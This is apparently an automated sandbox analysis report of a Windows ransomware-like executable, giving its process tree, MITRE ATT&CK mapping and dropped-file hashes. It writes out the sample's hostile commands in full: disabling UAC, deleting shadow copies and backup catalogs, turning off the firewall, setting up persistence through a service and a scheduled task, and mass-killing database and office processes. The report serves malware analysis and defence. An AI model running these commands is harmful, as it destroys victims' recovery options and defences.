PID 544 wrote to memory of 1460	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	38
PID 544 wrote to memory of 1460	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	38
PID 1460 wrote to memory of 1676	1460	cmd.exe	39
PID 1460 wrote to memory of 1676	1460	cmd.exe	39
PID 1460 wrote to memory of 1676	1460	cmd.exe	39
PID 1460 wrote to memory of 1676	1460	cmd.exe	39
PID 544 wrote to memory of 1672	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	40
PID 544 wrote to memory of 1672	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	40
PID 544 wrote to memory of 1672	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	40
PID 544 wrote to memory of 1672	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	40
PID 1672 wrote to memory of 1488	1672	cmd.exe	41
PID 1672 wrote to memory of 1488	1672	cmd.exe	41
PID 1672 wrote to memory of 1488	1672	cmd.exe	41
PID 1672 wrote to memory of 1488	1672	cmd.exe	41
PID 1676 wrote to memory of 1380	1676	WScript.exe	42
PID 1676 wrote to memory of 1380	1676	WScript.exe	42
PID 1676 wrote to memory of 1380	1676	WScript.exe	42
PID 1676 wrote to memory of 1380	1676	WScript.exe	42
PID 1676 wrote to memory of 1752	1676	WScript.exe	44
PID 1676 wrote to memory of 1752	1676	WScript.exe	44
PID 1676 wrote to memory of 1752	1676	WScript.exe	44
PID 1676 wrote to memory of 1752	1676	WScript.exe	44

C:\Users\Admin\AppData\Local\Temp\6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
"C:\Users\Admin\AppData\Local\Temp\6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
1⤵
- Drops startup file
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1540
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /v /fo csv
    3⤵
    - Enumerates processes with tasklist
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:976
- - C:\Windows\SysWOW64\findstr.exe
    findstr /i "dcdcf"
    3⤵
    PID:2040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1688
- - C:\Windows\SysWOW64\sc.exe
    sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
    3⤵
    - Launches sc.exe
    PID:1640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1352
- - C:\Windows\SysWOW64\sc.exe
    sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
    3⤵
    - Launches sc.exe
    PID:1496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\Admin\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1792
- - C:\Windows\SysWOW64\sc.exe
    sc create SqlBakup binPath= "C:\Documents and Settings\Admin\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
    3⤵
    - Launches sc.exe
    PID:1648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ver
  2⤵
  PID:1296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1460
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\S-8459.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1676
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\S-6748.bat
      4⤵
      PID:1380
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\S-6748.bat" "
      4⤵
      PID:1752
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /v
        5⤵
        Enumerates processes with tasklist
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:624
    - - C:\Windows\SysWOW64\find.exe
        
        find /I /c "dcdcf"
        5⤵
        
        PID:1856
    - - C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        Interacts with shadow copies
        
        PID:1864
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:1160
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1540
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
        5⤵
        
        PID:1816
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:1492
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1192
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
        5⤵
        
        PID:1768
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:1088
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1384
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
        5⤵
        
        PID:1060
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:1128
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
        5⤵
        
        PID:1204
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:972
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        
        PID:1016
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
        5⤵
        
        PID:1076
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:468
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        
        PID:888
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
        5⤵
        
        PID:840
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:904
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        
        PID:1792
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
        5⤵
        
        PID:568
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:1492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1672
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\S-2153.bat'" /f
    3⤵
    - Creates scheduled task(s)
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c echo %date%-%time%
  2⤵
  PID:1508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
  2⤵
  PID:1060
- - C:\Windows\SysWOW64\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:1692
- - C:\Windows\SysWOW64\find.exe
    find /i "os name"
    3⤵
    PID:1716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
  2⤵
  PID:824
- - C:\Windows\SysWOW64\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:744
- - C:\Windows\SysWOW64\find.exe
    find /i "original"
    3⤵
    PID:1184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ver
  2⤵
  PID:1256
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
  2⤵
  PID:1672
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:684
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1596
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:360
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:1608
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    PID:1392
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
    3⤵
    - Modifies Windows Firewall
    PID:528
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im msftesql.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1768
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlagent.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1276
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlbrowser.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlservr.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:360
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlwriter.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1016
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im oracle.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocssd.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im dbsnmp.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im synctime.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1084
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im agntsvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:596
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mydesktopqos.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im isqlplussvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1808
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im xfssvccon.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mydesktopservice.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:996
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocautoupds.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1716
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im agntsvc.exe
    3⤵
    - Kills process with taskkill
    PID:1616
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im encsvc.exe
    3⤵
    - Kills process with taskkill
    PID:2008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im firefoxconfig.exe
    3⤵
    - Kills process with taskkill
    PID:840
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im tbirdconfig.exe
    3⤵
    - Kills process with taskkill
    PID:1128
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocomm.exe
    3⤵
    - Kills process with taskkill
    PID:568
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld.exe
    3⤵
    - Kills process with taskkill
    PID:1256
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld-nt.exe
    3⤵
    - Kills process with taskkill
    PID:432
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld-opt.exe
    3⤵
    - Kills process with taskkill
    PID:596
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im dbeng50.exe
    3⤵
    - Kills process with taskkill
    PID:660
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqbcoreservice.exe
    3⤵
    - Kills process with taskkill
    PID:1276
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im excel.exe
    3⤵
    - Kills process with taskkill
    PID:912
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im infopath.exe
    3⤵
    - Kills process with taskkill
    PID:1272
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im msaccess.exe
    3⤵
    - Kills process with taskkill
    PID:1076
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mspub.exe
    3⤵
    - Kills process with taskkill
    PID:1124
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im onenote.exe
    3⤵
    - Kills process with taskkill
    PID:1636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im outlook.exe
    3⤵
    - Kills process with taskkill
    PID:1732
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im powerpnt.exe
    3⤵
    - Kills process with taskkill
    PID:1392
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im steam.exe
    3⤵
    - Kills process with taskkill
    PID:1408
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thebat.exe
    3⤵
    - Kills process with taskkill
    PID:1688
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thebat64.exe
    3⤵
    - Kills process with taskkill
    PID:1196
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thunderbird.exe
    3⤵
    - Kills process with taskkill
    PID:1820
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im visio.exe
    3⤵
    - Kills process with taskkill
    PID:1724
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im winword.exe
    3⤵
    - Kills process with taskkill
    PID:820
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im wordpad.exe
    3⤵
    - Kills process with taskkill
    PID:1384

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1044

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\S-2153.bat

Filesize
138B

MD5
82a528cbf39b8ea7e2982e7b2305204c

SHA1
717836e0e2b304ed7ae239cc1db0f6f80e0419b1

SHA256
616738526c38e04f992b7b9fc60cb7feb3ee416bf47b69aa2c3a5f1a722a653b

SHA512
eff7654e171dbd9bc471718a7e14ee3c84a9edf948f4c8863c8107e653be8ba06bc7a2876d506d6e4ae7ef2280e820d04615ebcd88894ef01b3667d070241db3

Download Submit
C:\Users\Admin\AppData\S-6748.bat

Filesize
2KB

MD5
3dba4c2dba3286a09d0b8ee61569f602

SHA1
4fb2a73854fad23f26d08c76fdda4e2268ea5f9e

SHA256
89d549b2862e20141b0b25ed7165a00e27ed865c6fb78be56393b8395465f5c7

SHA512
054c3c7ff25534a4b24f03ec62aa38c0f8352948d350f008f1b7beb3c72ea3c495fcb8c3194d9bfc3fffc363c2bca5c05d520942c063d450127c188afc2ba0d0

Download Submit
C:\Users\Admin\AppData\S-8459.vbs

Filesize
686B

MD5
ed7a274ff8ac640416952bfb5d6c927a

SHA1
6b33cd5b39db6e9a900336e446f64a137f0a0f42

SHA256
4d68e4a7a437eb4a7ad9c7b28bdda894a68ae41efba8a5e4d3a6a930bebfeea5

SHA512
8f3a4f071550afe716c5d39601cf1e8559084fbb701e95b28eb7685fed6d8a972e662ad19124a2242fd30c291b8dd1f18f1a2dcf56ac6c98f2bf96bac91510f3

Download Submit
memory/544-54-0x0000000076151000-0x0000000076153000-memory.dmp

Filesize
8KB

Download